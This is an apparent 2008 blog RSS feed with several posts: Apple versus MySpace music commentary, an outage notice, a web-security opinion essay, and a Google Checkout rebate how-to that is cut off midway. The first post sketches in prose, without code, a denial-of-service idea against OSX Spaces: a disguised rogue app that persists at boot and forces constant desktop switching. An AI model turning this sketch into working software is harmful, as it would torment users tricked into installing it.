<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	>

<channel>
	<title>theReformed</title>
	<atom:link href="http://www.thereformed.org/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.thereformed.org</link>
	<description>life portfolios of the e-nfluential</description>
	<pubDate>Sun, 04 May 2008 16:19:01 +0000</pubDate>
	<generator>http://wordpress.org/?v=2.5-RC1</generator>
	<language>en</language>
			<item>
		<title>THEORY: Apple OSX Spaces Vulnerable</title>
		<link>http://www.thereformed.org/2008/05/03/theory-apple-osx-spaces-vulnerable/</link>
		<comments>http://www.thereformed.org/2008/05/03/theory-apple-osx-spaces-vulnerable/#comments</comments>
		<pubDate>Sat, 03 May 2008 18:41:16 +0000</pubDate>
		<dc:creator>J. Longoria</dc:creator>
		
		<category><![CDATA[apple]]></category>

		<category><![CDATA[j. longoria]]></category>

		<category><![CDATA[methodology]]></category>

		<category><![CDATA[software]]></category>

		<category><![CDATA[theory]]></category>

		<category><![CDATA[vulnerability]]></category>

		<category><![CDATA[denial-of-service]]></category>

		<category><![CDATA[osx]]></category>

		<guid isPermaLink="false">http://www.thereformed.org/?p=129</guid>
		<description><![CDATA[Apple&#8217;s OSX iterations have been known to be some of the more securely designed operating systems on the planet. There is no real threat from viruses under OSX because of its strict use of access rights, built into its BSD base, which regulates the access rights of every user on the system. However, basic security in their [...]]]></description>
			<content:encoded><![CDATA[<p>Apple&#8217;s OSX iterations have been known to be some of the more securely designed operating systems on the planet. There is no real threat from viruses under OSX because of its strict use of access rights, built into its BSD base, which regulates the access rights of every user on the system. However, basic security in their user interface could be compromised, through an effective Denial of Service, by a very simple, very useful feature known as &#8220;<strong>Spaces</strong>&#8221;, a feature lifted and rebranded from X Windows and Amiga (reference: <a title="Virtual Desktops History" href="http://en.wikipedia.org/wiki/Virtual_desktop" target="_blank">Wikipedia</a>).</p>
<p id="_mc_tmp"><span id="more-129"></span></p>
<p>I got to scratching my head when playing with this feature, realizing its potential flaw is so simple it&#8217;s almost idiotic and, so far as I can ascertain, overlooked or ignored. The premise of this theory is that Spaces is a means of virtualization of the desktop, wherein users are able to have multiple desktops hosting multiple applications in each window without the need to cram everything you&#8217;re using onto one screen by itself at any given time. On one desktop or Space, I could have Adobe Photoshop CS3+ running, iChat on another and on the next I could be using Microsoft Entourage to check my e-mail. Three separate Spaces have expanded my desktop now from <strong>1280&#215;1024 to 1280&#215;1024x3</strong> (<em>up to 16 Spaces are allowable according to Apple</em>). The possibilities for efficiency with this are endless; however, there is a problem.</p>
<p>Spaces inherently has a function whereby the user is able to switch between Spaces based on a set of key combinations; for example, I picked the Command and Arrow keys to swap between my Spaces - in succession, I can hold down Command+Right Arrow and swap between all three Spaces, one right after the other. A behavior I stumbled on, though, has alarmed me. Spaces has a hook in place by default, with no apparent trigger to disable it from the Preference Pane, where if I receive an instant message via iChat, I will switch from one Space to the next Space that hosts the iChat application.</p>
<p>So, although I provide no proof of concept at this time (<em>if someone would like to write one I will be happy to post it here for review</em>), there is an underrated Denial of Service to the user interface itself available here for exploitation by any software engineer adept enough. I imagine the scenario to play out like this:</p>
<ol>
<li>An exploit is installed unwittingly by the user, who will undoubtedly have to enter the Administrator password to install the application on OSX - providing this hasn&#8217;t been disabled by either the user or the software itself.</li>
<li>The exploit is either run by the user or is loaded as a service, possibly on boot from <strong>&#8230;/com.apple.boot.plist</strong> or something of a similar nature.</li>
<li>The user logs into their desktop profile.</li>
<li>The exploit, sensing the login, triggers the involuntary hook that iChat and numerous other applications use to swap between desktops, one after the other, consecutively, where &#8220;Force Quit&#8221; is useless to stop it since it does not load atop the desktops themselves, but announces itself within the Space windows.</li>
<li>The involuntary action continues until the user reboots the system, only to encounter the same issue when they login once again.</li>
</ol>
<p>Anyone can test the basics of this scenario if they have an Apple or OSX on x86 hardware by logging in, setting up Spaces via the System Preferences and its associated Preference Pane and committing to the keys chosen multiple times - Spaces is apparently resource intensive enough to continue after you&#8217;ve stopped hitting keys, executing each successfully, but semi-involuntarily. This issue seems to lend credit to the idea that perhaps Spaces is broken, as <a title="The Problem with Spaces" href="http://www.dribin.org/dave/blog/archives/2007/11/13/spaces/" target="_blank">Dave Dribin</a> argues in his weblog entry.</p>
<p><strong>PROS: </strong>The unfortunate pro is that because Apple has concentrated on making the Mac user-friendly to even the lowest layman (<em>it just works</em>), a large segment of its userbase would be affected because they are naive enough to go along with a professional-looking installation - perhaps this exploit disguised as a free product to optimize their already fast Apple in the first place. Windows users have fallen prey to this very phenomenon; should we really assume Apple&#8217;s users are much different?</p>
<p><strong>CONS: </strong>The cons of such a DoS would be that it isn&#8217;t effective against users who do not choose to use Spaces (<em>it isn&#8217;t an option loaded by default</em>) and there are several actions the user would need to take, or the exploit author would have to change on default installation of the rogue application, before the DoS would take effect. Additionally, the exploit author might have to somehow hinder the &#8220;F8&#8221; enabling/disabling function for Spaces, which could be accomplished with a minimal degree of effort.</p>
<p>The remaining question, posed by a viewer, is whether or not this behaviour could survive Single-User mode via whatever framework set it in motion. That remains to be seen.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.thereformed.org/2008/05/03/theory-apple-osx-spaces-vulnerable/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Apple Wins by the Numbers</title>
		<link>http://www.thereformed.org/2008/04/24/apple-wins-by-the-numbers/</link>
		<comments>http://www.thereformed.org/2008/04/24/apple-wins-by-the-numbers/#comments</comments>
		<pubDate>Wed, 23 Apr 2008 23:15:29 +0000</pubDate>
		<dc:creator>J. Longoria</dc:creator>
		
		<category><![CDATA[development]]></category>

		<category><![CDATA[internet]]></category>

		<category><![CDATA[j. longoria]]></category>

		<category><![CDATA[opinion]]></category>

		<category><![CDATA[software]]></category>

		<category><![CDATA[technology]]></category>

		<category><![CDATA[apple]]></category>

		<category><![CDATA[challenge]]></category>

		<category><![CDATA[itunes]]></category>

		<category><![CDATA[myspace]]></category>

		<guid isPermaLink="false">http://www.thereformed.org/?p=128</guid>
		<description><![CDATA[A quick follow-up to the challenge MySpace is serving up to Apple with their music service, as I wrote about previously (reference: http://www.thereformed.org/2008/04/07/myspace-gambles-big-on-lost-cause/). As I stated before, I don&#8217;t believe MySpace will be able to capture a significant market share in an industry which is experiencing innovations per quarter from the company who established and [...]]]></description>
			<content:encoded><![CDATA[<p>A quick follow-up to the challenge MySpace is serving up to Apple with their music service, as I wrote about previously (reference: <a title="MySpace Gambles Big on Lost Cause" href="http://www.thereformed.org/2008/04/07/myspace-gambles-big-on-lost-cause/" target="_blank">http://www.thereformed.org/2008/04/07/myspace-gambles-big-on-lost-cause/</a>). As I stated before, I don&#8217;t believe MySpace will be able to capture a significant market share in an industry which is experiencing innovations per quarter from the company who established and arguably perfected the very model industry leaders are salivating to get a bigger piece of, and the major economic downturn (<em>an obvious recession.. if it looks like a duck&#8230;</em>) which is hitting consumers in the pocketbook. What this brief article addresses is the sheer, implausible numbers game that a small fish such as MySpace is facing in a private pond that&#8217;s home to a big hungry shark.<span id="more-128"></span></p>
<p>(<em><span style="color: #ff9900;">NOTE: Updated to reflect the correct number of iPods sold by Apple, to also include iPhones which are capable of playing music, according to their report released in late April.</span></em>)</p>
<p>Upon doing some quick research on the scope of MySpace&#8217;s endeavour, I came across some interesting analysis. MySpace claims it has over <strong>100 million users</strong> - that doesn&#8217;t necessarily mean that they all convene over MySpace Music, but it does lend credit to the idea that they have a sufficient userbase to challenge Apple&#8217;s iTunes on&#8230; if it were true. <strong>ForeverGeek</strong> produced a detailed, albeit unofficial, breakdown of MySpace&#8217;s inevitably flawed and potentially deceitful claim/myth in their article &#8220;<em>Debunking the MySpace Myth of 100 Million Users</em>&#8221; (reference: <a title="Debunking the MySpace Myth of 100 Million Users" href="http://forevergeek.com/articles/debunking_the_myspace_myth_of_100_million_users.php" target="_blank">http://forevergeek.com/articles/debunking_the_myspace_myth_of_100_million_users.php</a>), disavowing the validity of the idea that they&#8217;ve got a larger share than they have in all actuality. The numbers computed actually add up to a lofty <strong>43 million</strong> persons (<em>not counting multiple accounts per person</em>), give or take.</p>
<p>Apple, however, obviously gathers their user data in realtime. On April 3, 2008 it announced in a press release that it has reached over <strong>50 million users</strong>, which might only need to be corrected for inactive accounts, if it hasn&#8217;t been already (reference: <a title="Apple iTunes Press Release for 20080403" href="http://www.apple.com/pr/library/2008/04/03itunes.html" target="_blank">http://www.apple.com/pr/library/2008/04/03itunes.html</a>). Supporting that service number, it is widely acknowledged that the innovator has sold over <strong>110 million iPod units</strong> (<em>as of September 2007</em>) worldwide since its inception. Although the market is being saturated by them, <span style="text-decoration: line-through;">it is predicted that Apple will still boast up to approximately </span><strong><span style="text-decoration: line-through;">10.5 million</span></strong><strong> 10,644,000 iPods</strong> and <strong>1,703,000</strong> <strong>iPhones</strong> were sold for the <strong>quarter</strong>. A number like that must include fallover/rollover from previous models, but we can definitely expect that a large percentage of that are new owners/users of the iPod/iTunes marriage, such as is mentioned in Tom Krazik&#8217;s smart article <em>&#8220;Apple&#8217;s spring lacks pizazz but should be solid&#8221;</em> (reference: <a title="Apple's spring lacks pizazz but should be solid" href="http://www.news.com/8301-13579_3-9927415-37.html?tag=nefd.lede" target="_blank">http://www.news.com/8301-13579_3-9927415-37.html?tag=nefd.lede</a>).</p>
<p>Apple&#8217;s success with this marriage is due to their productive symbiosis. Software for hardware for consumers who demand an intuitive user experience to access music for the recording industry labels&#8217; profit bottom line for artists who need an online software solution to distribute their content to a mass audience who has hardware to listen&#8230; it is its own ecosystem, and with any good ecosystem there are natural deterrents ingrained in it in an attempt to prevent anything from upsetting that ecosystem. MySpace had better put on its boots and dig in, because Apple isn&#8217;t going to let territory go without a fight. At D5, Steve Jobs on stage established that for years they were very poor at partnering with other companies or entities to achieve goals. In no uncertain words, he indicated that is no longer the case, and we can be sure that Apple&#8217;s talent is sourcing the next generation of entertainment distribution somewhere&#8230; As I said in my last article, I&#8217;d put my bet on the rival social networking site Facebook, but that remains to be seen. If MySpace expects to gain ANY ground in their fight for dominance, they&#8217;d better target more than one playback device, partner with both big labels and indie labels to distribute, and it would behoove them to develop their own lossless playback format or enable support for Apple&#8217;s own. They&#8217;ll have to significantly undercut Apple&#8217;s rates, which will hurt either their target audience coverage or their pocketbook by taking the hit, and now they&#8217;ll have to dance for the movie studios since iTunes has successfully moved into movie rental/ownership through their service. SnoCap is riding the coattails of MySpace, garnering the attention of their target audience to boost a profit&#8230; it&#8217;s a temporary solution to a non-existent problem. MySpace will need to wake up from this relationship in order to gain the margins in their favor.</p>
<p>On top of the hype is the confusion or ignorance regarding MySpace&#8217;s &#8216;<em>innovations</em>&#8217; in the field of music. <strong>Melissa Chang</strong> (<em>The Standard</em>) seems to have hastily proclaimed that, &#8220;<em>MySpace was the first such site to empower musicians, making it simple (and free) for any band or artist to create a Web presence complete with streaming music, an upcoming tour schedule, and a way to enlist &#8220;fans&#8221;&#8230; </em>(reference: <a title="How MySpace Music Could Beat iTunes" href="http://www.thestandard.com/news/2008/04/04/how-myspace-music-could-beat-itunes" target="_blank">http://www.thestandard.com/news/2008/04/04/how-myspace-music-could-beat-itunes</a>)&#8221;. Perhaps Melissa has seemingly forgotten such iconic sites as <strong>MP3.com</strong>, who developed one of the original, plausible models of online music distribution on the Internet without cost to the user?</p>
<p>I find this evolving situation all so captivating and I look forward to seeing where this challenge propels the industry and associated consumer market. Due to the fairly convincing facts, Apple stands to lose virtually nothing and MySpace stands to jump on a failing bandwagon to overtake the godfather of music services via the <em>Cloud</em>. The reign won&#8217;t be permanent, I am sure we can all agree - this effort, however, will not spell the end.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.thereformed.org/2008/04/24/apple-wins-by-the-numbers/feed/</wfw:commentRss>
		</item>
		<item>
		<title>MySpace Gambles Big on Lost Cause</title>
		<link>http://www.thereformed.org/2008/04/07/myspace-gambles-big-on-lost-cause/</link>
		<comments>http://www.thereformed.org/2008/04/07/myspace-gambles-big-on-lost-cause/#comments</comments>
		<pubDate>Sun, 06 Apr 2008 23:51:32 +0000</pubDate>
		<dc:creator>J. Longoria</dc:creator>
		
		<category><![CDATA[development]]></category>

		<category><![CDATA[internet]]></category>

		<category><![CDATA[j. longoria]]></category>

		<category><![CDATA[opinion]]></category>

		<category><![CDATA[software]]></category>

		<category><![CDATA[technology]]></category>

		<category><![CDATA[apple]]></category>

		<category><![CDATA[gamble]]></category>

		<category><![CDATA[itunes]]></category>

		<category><![CDATA[music]]></category>

		<category><![CDATA[myspace]]></category>

		<guid isPermaLink="false">http://www.thereformed.org/?p=127</guid>
		<description><![CDATA[MySpace has matured the social networking portal more than any other provider, but how will they fare in the media market - specifically their venture in MySpace music? They&#8217;re going after the hallowed ground of Apple&#8217;s iTunes and I suspect that we might not necessarily see a failure (because MySpace&#8217;s user-base is so very large it can take the hit), [...]]]></description>
			<content:encoded><![CDATA[<p>MySpace has matured the social networking portal more than any other provider, but how will they fare in the media market - specifically their venture in MySpace music? They&#8217;re going after the hallowed ground of Apple&#8217;s iTunes and I suspect that we might not necessarily see a failure (<em>because MySpace&#8217;s user-base is so very large it can take the hit</em>), but we can foresee that no notable, sustainable gains will be made - Apple&#8217;s loyalists will benefit from it extremely, however. Why?<span id="more-127"></span></p>
<p>It partly boils down to convenience in the user experience. That is, the ten-foot viewing experience in the living room, the 3-5 foot interactive experience in the office and the in-hand experience that you&#8217;ll inevitably want when going for that afternoon jog (<em>I know I do</em>). MySpace, without a device, cannot challenge Apple&#8217;s iTunes in their sandbox. This obviously isn&#8217;t the only factor, as Microsoft&#8217;s Zune has only captured a slight market share against Apple&#8217;s iPod series despite the significant roll-out of the media device.</p>
<p>The recent shake-up in the format war between HD-DVD and Blu-Ray discs, where HD-DVD conceded defeat, provides credit to the idea that big money from big backers won&#8217;t necessarily buy you big wins. MySpace Music&#8217;s big three music companies providing backing are counting on this very same flawed philosophy, though, in a blatant attempt to increase their profit intake for their portfolios online, something that is currently regulated effectively by Apple and their iTunes software + licensing agreements.</p>
<p>The strategy they take would have to be one of low-cut pricing, however, even Amazon&#8217;s model hasn&#8217;t taken hold and they&#8217;ve posted no profits (<em>not necessarily a surprise with Amazon since it took them several years to get anywhere beyond breaking even</em>). Offering cost-effective or feeless downloads to their user community could see them gain large adoption&#8230; but that still leaves them on the social networking cutting room floor. MySpace&#8217;s interface IS NOT intuitive enough to deal with their own social networking customers and advertising partners. It is an amalgamation of horrid code and poorly defined front-end design that MUST be reengineered to effectively entice the loyalists of Apple, pampered as they may be.</p>
<p>MySpace is a unique case and possibly a perfect platform for recording industry leaders to force Apple&#8217;s hand, something that half a dozen other companies including Sony and Microsoft have not even come close to doing. So MySpace, a strictly speculative software company, a fledgling in any marketplace outside of social networking and who is quickly losing market share to better web applications as a service providers like Facebook, is going to try to duke it out with Apple, a hardware and software applications integration pioneer, on their turf? It just isn&#8217;t going to happen.</p>
<p>Speaking of Facebook, I can&#8217;t wait until iTunes somehow integrates with it since Apple and Facebook have been in bed for almost a year, maybe more (<em>as can be seen in a recent podcast regarding the iPhone software roadmap and the release of their open SDK</em>). That is strictly speculation on my part, but now both companies have a reason to want MySpace in the gutter and that is a powerful combination to tango with.</p>
<p>As mentioned before, there is one usergroup that will benefit from any challenge to Apple&#8230; that is the Apple users, such as myself (<em>yes, after over a decade of lauding the PC I&#8217;ve been sincerely sold on Steve Jobs&#8217; vision and I just don&#8217;t care to look back</em>), themselves. Bring it on MySpace, you&#8217;re only making my stock go up and my user-experience richer.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.thereformed.org/2008/04/07/myspace-gambles-big-on-lost-cause/feed/</wfw:commentRss>
		</item>
		<item>
		<title>And From the Shadows of Confusion</title>
		<link>http://www.thereformed.org/2008/03/18/and-from-the-shadows-of-confusion/</link>
		<comments>http://www.thereformed.org/2008/03/18/and-from-the-shadows-of-confusion/#comments</comments>
		<pubDate>Tue, 18 Mar 2008 18:51:26 +0000</pubDate>
		<dc:creator>theReformed</dc:creator>
		
		<category><![CDATA[experience]]></category>

		<category><![CDATA[q&amp;a]]></category>

		<category><![CDATA[thereformed]]></category>

		<guid isPermaLink="false">http://www.thereformed.org/2008/03/18/126/</guid>
		<description><![CDATA[So we&#8217;ve been out a little while, huh? Whelp, the most unexpected things tend to happen at the most inopportune times. However, we&#8217;re back! As rumors flourish about the web that we gave up or that the website was cracked, we still press-on. So what happened?
No, as popular as it might be to believe, we [...]]]></description>
			<content:encoded><![CDATA[<p>So we&#8217;ve been out a little while, huh? Whelp, the most unexpected things tend to happen at the most inopportune times. However, we&#8217;re back! As rumors flourish about the web that we gave up or that the website was cracked, we still press-on. So what happened?<span id="more-126"></span></p>
<p>No, as popular as it might be to believe, we were not compromised. We did, however, fall prey to the insidious forces of data corruption.</p>
<p>It seems we ran into a small problem with our current hosting platform provider, graciously provided by CodeCircus, Ltd. (reference: <a title="CodeCircus, Ltd." href="http://www.codecircus.co.uk" target="_blank">http://www.codecircus.co.uk</a>) out of the United Kingdom. Our specific server was getting a slight software/build overhaul by one of their System Engineers, when somehow inadvertently the site itself was wiped by some odd glitch in the backup/transfer process - this slightly corrupted the database tables and skewed the permissions of the directory and/or sandbox(jail) we run in (we&#8217;re still trying to piece that one together).</p>
<p>So to say, we&#8217;ve been down for about a month after performing an in-depth forensic analysis of the logs, traffic and services. You may notice that the site now runs slightly faster and we&#8217;re operating on the fringe of bleeding edge w/ WordPress&#8217; most current offering(s).</p>
<p>We have an interface change coming soon, something we&#8217;ve been working on off-and-on for a few months in-between our daily moments in life, career and family.</p>
<p>We want to thank you for being such soldiers and awaiting our official return and reclamation in the publishing circus known as the Internet. Keep reading!</p>
]]></content:encoded>
			<wfw:commentRss>http://www.thereformed.org/2008/03/18/and-from-the-shadows-of-confusion/feed/</wfw:commentRss>
		</item>
		<item>
		<title>WebAppSec and Consumer Ignorance</title>
		<link>http://www.thereformed.org/2008/01/05/webappsec-and-consumer-ignorance/</link>
		<comments>http://www.thereformed.org/2008/01/05/webappsec-and-consumer-ignorance/#comments</comments>
		<pubDate>Fri, 04 Jan 2008 21:03:35 +0000</pubDate>
		<dc:creator>J. Longoria</dc:creator>
		
		<category><![CDATA[ethics]]></category>

		<category><![CDATA[internet]]></category>

		<category><![CDATA[j. longoria]]></category>

		<category><![CDATA[opinion]]></category>

		<category><![CDATA[webappsec]]></category>

		<guid isPermaLink="false">http://www.thereformed.org/2008/01/05/webappsec-disclosure-and-consumer-ignorance/</guid>
		<description><![CDATA[First article of the new year is in regards to the flourishing WebAppSec community and its guidance effort targeting developers and consumers alike. The threat of web application vulnerabilities is now a common-place theme in this new day. Over the last ten years, the advent of the information security community, something previously overlooked, has been [...]]]></description>
			<content:encoded><![CDATA[<p>First article of the new year is in regards to the flourishing WebAppSec community and its guidance effort targeting developers and consumers alike. The threat of web application vulnerabilities is now a common-place theme in this new day. Over the last ten years, the advent of the information security community, something previously overlooked, has been its gradual embracing of the need for web application security as data, handling and formatting become more dynamic. The community has turned itself 180-degrees from reactive to proactive, albeit without a widely adopted standardization in responsibility / disclosure (<em>which in itself has led to a significant uprise in baseless, malicious disclosures by the 13-year-old next door, savvy with his laptop and his illegitimate copy of AppScan</em>).<span id="more-103"></span></p>
<p>
As a branch-community, WebAppSec has done a piss-poor job in educating the developer masses, and instead of concentrating on measures in reaction, we should have been concentrating on measures in foundation. What I mean by this, harkening back to a segment in one of my previous articles (<a href="http://www.thereformed.org/2007/04/22/internet-communication-needs-ratts/" title="Internet Communication Needs RATTS" target="_blank"><em>here</em></a>), is that there has been no residual accountability in our community or the industry for their lack of education of the end-user on their avenues of protection in production. The industry throws fifteen different security products at them and, through fear-marketing, tells them everything is at stake if they don&#8217;t purchase our product - something which may or may not be true depending on circumstance. The consumer doesn&#8217;t necessarily <strong>NEED</strong> to understand the technologies being employed in protecting their assets after-the-fact; however, what they do need is education in at least understanding their web-application from the security standpoint at origin. The only viable answer to the security question is strictly in the hands of the author of the application itself at the time of production. This weblog itself @ theReformed, running <em>WordPress</em>, is inherently vulnerable to any number of published or unpublished vulnerabilities because it wasn&#8217;t designed as a secure application, but as a publicly-accessible publishing platform (say that five times fast).</p>
<p>
Sure, there exist any number of open disclosure policies (<a href="http://www.wiretrip.net/rfp/policy.html" title="RFPolicy v2.0" target="_blank"><em>RFPolicy v2.0</em></a>), but how many people in the webappsec community are adhering to these guidelines? In that context, we&#8217;ve therefore allowed the industry&#8217;s constituents to regulate themselves, and the avenue of open-source technology, development and information has cut our own throats. Of course, as things roll downhill, that massacre has been passed on to the unsuspecting consumer, one who, not by choice, is inherently ignorant of the threats against their personal or business web-applications.</p>
<p>
<span class="Apple-style-span" style="FONT-STYLE: italic"><strong>FORWARD NOTE: Regarding my next few points, as most of you know I respect Robert and his opinions very much, having known him for many years now since we emerged from a different ethical scene - I even invited him to my wedding :D. I believe he understands that I do my best to stay unbiased and objective when I look at a concept. Most of his opinions and statements in this interview I agreed with - I just happen to have a different perspective than his on a few specific points.</strong></span></p>
<p>Recently, I was reading <strong>Net-Security.org&#8217;s INSECURE MAG #14</strong> (<a href="http://www.net-security.org/dl/insecure/INSECURE-Mag-14.pdf" title="INSECURE MAG #14" target="_blank"><em>here</em></a>) and came across an interview with my friend <strong>Robert Hansen</strong> (<a href="http://ha.ckers.org" title="HA.CKERS.ORG WEBAPPSEC LABS" target="_blank"><em>RSnake</em></a>) that was discussing his expertise, impact and opinions on WebAppSec, wherein he stated something that I took a step back and had to think about: &#8220;<em>I know lots of people think that stupid users are to blame for getting hacked, but I totally disagree with that (I like to think I have a pretty modern view of security in this regard) &#8230;.. They&#8217;ve followed every piece of advice that we as the security community have programmatically offered them. The answer, unfortunately is that we, as a security community, have done a miserable job in giving consumers the correct tools to secure themselves.</em>&#8221;</p>
<p>This is where Robert and I would most likely differ in opinion - I believe we, as the security community, have performed poorly in <span style="FONT-WEIGHT: bold" class="Apple-style-span">defining a relative standard of secure code practice</span> for our associated developer community. It shouldn&#8217;t entirely be the consumer&#8217;s responsibility to police their Internet application, because the basic design, language, string, library or algorithm is inherently flawed before they ever utilize it (granted, not always the case, but plausible) - there are only a handful of relevant checks and balances keeping someone from writing a vulnerable application inside tools like <em>Microsoft Visual Studio</em> or even rich-media development tools like <em>Adobe Flash Studio</em>. The community should be assessing and mitigating the threat beforehand, establishing an instructional programming alternative for our developer community, decreasing the likelihood of poorly implemented, insecure products ever making it to market before we have to come up with workarounds and patches in the first place - it&#8217;s a lofty and far-flung idea, probably never to happen, I&#8217;ll concede that.</p>
<p>I might also not agree, respectfully, when he says, &#8220;<em>Let&#8217;s take an example of a user who logs into a Windows machine for the first time. It complains that there is no AV or Firewall. So they turn on Windows firewall or install another one, and the AV of their choice. They patch up because Windows yells at them. Does that make them secure?</em>&#8221;, in the sense that the consumer IS partially to blame in many cases by failing to heed these warnings.</p>
<p>Using an unnamed associate as an example (<em>accomplished in his professional career, but certainly technology-disabled - though not illiterate</em>), he strictly looks for <span style="FONT-STYLE: italic" class="Apple-style-span">compliance</span> (<span class="Apple-style-span" style="FONT-STYLE: italic">as Robert pointed towards consumers earlier in the interview</span>) with the necessity of securing his data and the method of handling it, with no deliberate intent to protect it other than what the industry has thrown at him as a solution to do so, spending countless dollars on suites of software that are ineffective. Unfortunately, those solutions don&#8217;t fix the problem and software nagware only serves to irritate him rather than motivate him to further correct the problem. This is <span style="FONT-STYLE: italic" class="Apple-style-span">self-imposed ignorance</span> on the <span style="FONT-STYLE: italic" class="Apple-style-span">part of the consumer</span>, wherein all the, and I use the term loosely, &#8216;<em>solutions</em>&#8217; have been presented, but out of fear, interest or lack of comprehension of its necessity / role the consumer doesn&#8217;t implement it. Why wouldn&#8217;t they be to blame, depending on circumstantial eligibility?</p>
<p>What advocacy group has this community developed that really speaks to the consumer on their level, leveraging the appropriate solutions / alternatives to their counterparts? <a href="http://www.owasp.org" title="OWASP" target="_blank">OWASP</a> is about as close as it gets to this definition that I&#8217;ve seen, a quite commendable effort by volunteers, but still lacking in the ability to connect with the consumer at the lowest tier, the market driving force that creates the demand - a demand that shouldn&#8217;t exist or should at least be transparent in some form. There is an old adage that the people and the politicians don&#8217;t speak the same language; the same can be said for programmers and end-users, they just don&#8217;t speak the same language, which is why IBM hires/employs a marketing firm or internal professionals to create its commercials, awareness ads and advertisements. If it was left up to the programmers, the commercial would hypothetically be in all scrolling binary, with a black screen, red letters and Nine-Inch-Nails playing in the background. Probably not as bad as that, but you get the idea.</p>
<p>Additionally, the playing field has grown much too large and the consumer audience&#8217;s choices factor. Fields of products are making claims to patch mistakes, prevent authentication issues, reduce buffer exploitation and secure this / that. Yes, we&#8217;ve most certainly stepped to the plate in providing tools - however, how appropriate, efficient or relevant are they to the commonplace pitfalls programmers encounter? They number in the hundreds now commercial or otherwise, becoming exhaustive for even a entire team of  professionals to completely evaluate for their uses. It would also seem, that the most effective tools have a history of having the most ineffective marketing campaigns, suffering poor adoption rates throughout the consumer community while some of the most ridiculous software packages have made their mark (<em>and buck</em>) because they know how to speak to the market. So there is a problem of communication and associating or relating the problem at hand to the consumer.</p>
<p>Rounding this back out to a final point, we must depend on our software architects/authors/programmers/magicians to apply the proper precautions when developing their next application. We can&#8217;t expect them to do this, without lobbying them with the appropriate instructions, tools and content to do so. We can&#8217;t assail our consumer base with the products to fix the things these individuals have failed to mitigate initially without realizing we could have resolved the situation from the ground-up and then blame our consumers for failing to act on our recommendations when we don&#8217;t provide some glimmer of hope that we&#8217;re working to improve their software&#8217;s security before it even hits the market <strong>-OR-</strong> we saturate them with so many warnings that they stop listening (<em>ala &#8216;the boy who cried wolf&#8217;</em>).</p>
]]></content:encoded>
			<wfw:commentRss>http://www.thereformed.org/2008/01/05/webappsec-and-consumer-ignorance/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Make Out with Google Checkout</title>
		<link>http://www.thereformed.org/2007/12/13/make-out-with-google-checkout/</link>
		<comments>http://www.thereformed.org/2007/12/13/make-out-with-google-checkout/#comments</comments>
		<pubDate>Thu, 13 Dec 2007 16:33:08 +0000</pubDate>
		<dc:creator>J. Longoria</dc:creator>
		
		<category><![CDATA[briefs]]></category>

		<category><![CDATA[howto]]></category>

		<category><![CDATA[internet]]></category>

		<category><![CDATA[j. longoria]]></category>

		<guid isPermaLink="false">http://www.thereformed.org/2007/12/13/make-out-with-google-checkout/</guid>
		<description><![CDATA[No, the title isn&#39;t what it seems to suggest (which, incidentally, is physically impossible as far as I know to have any sort of romantic, physical relationship with software, but who knows what those kids at Google are thinking up), just a play on words. Here, I go into a brief instructional&#160;dialog on how to [...]]]></description>
			<content:encoded><![CDATA[<p>No, the title isn&#39;t what it seems to suggest (<span style="font-style: italic" class="Apple-style-span">which, incidentally, is physically impossible as far as I know to have any sort of romantic, physical relationship with software, but who knows wh</span><span style="font-style: italic" class="Apple-style-span">at those kids at Google are thinking up</span>), just a play on words. Here, I go into a brief instructional&nbsp;dialog on how to get some free or lower cost gear using the <span style="font-weight: bold" class="Apple-style-span">Google Checkout</span> API and it&#39;s associated &#39;offer&#39;. Everyone likes free stuff right?&nbsp;</p>
<p> <span id="more-102"></span>
<p>Searching through Google&#39;s APIs, I found one that is called Google Checkout - I thought it was a little out of Google&#39;s arena to concentrate on software that was so simple when their time seems to be best spent on sitting on their hands regarding privacy vulnerabilities in their forest of domains (&nbsp;<span style="font-style: italic" class="Apple-style-span">http://www.thereformed.org/2007/08/21/google-xss-destruction-of-mankind/</span> ), but then I began to see the implications of how it could propel them into a financial go-between scenario, incognito, and concede that down the road this will be quite beneficial to them.</p>
<p>So, I ventured off into the Internet to see how much penetration this API was getting, and whether or not it was plausible to incorporate into a project I have upcoming, and unexpectedly came across an advantageous find. Google Checkout has been offering an instantaneous, <span style="text-decoration: underline" class="Apple-style-span">free $10.00 rebate</span> with purchases made through sites that incorporate its API. Because of this, products in that price range could essentially be acquired free or at low cost to the consumer. A good example of this is <span style="font-weight: bold" class="Apple-style-span">Buy.com</span> and I will get into this shortly.</p>
<p>Granted, doing a little more searching I realized that apparently I am not the only one that happened upon this, in fact, I venture that at least a dozen posts have been published on the Web so far. At the risk of being redundant, however, knowing the vast audience our site is being visited by, I figured if anything we could pass along this smart little tidbit for a larger dissemination than others have gotten previously.</p>
<p>So, without further delay, let me get to the bits. Items required to successfully complete this transaction: <span style="font-weight: bold" class="Apple-style-span">(1)</span>&nbsp;A URL with a product that is $10.00 (<span style="font-style: italic" class="Apple-style-span">if you&#39;re looking to get something for free</span>). <span style="font-weight: bold" class="Apple-style-span">(2)</span>&nbsp;An account with Google, most likely through GMail - it is suggested that you be logged in to avoid having to create a new account or to register. <span style="font-weight: bold" class="Apple-style-span">(3)</span>&nbsp;Approximately 3 minutes of time to enter your information for shipping, etc. <span style="font-weight: bold" class="Apple-style-span">(4)</span>&nbsp;The basic human ability to read and follow the instructions, correctly.&nbsp;</p>
<p>Our target is going to be Kingston&#39;s 1Gb USB 2.0 Flash Thumbdrive located here @&nbsp;http://www.buy.com/prod/kingston-1gb-data-traveler-usb-2-0-flash-drive/q/loc/101/202743517.html . This drive is on sale at the Buy.com price of $10.00, right? NO! It is on sale at the Google Checkout price of <span style="font-weight: bold" class="Apple-style-span">FREE</span>.</p>
<p>Let me explain. Buy.com sells it at its reduced price, but the first purchase you make through Google Checkout takes money off the top. In this case, the two cancel each other out because the pricing is obviously the same.</p>
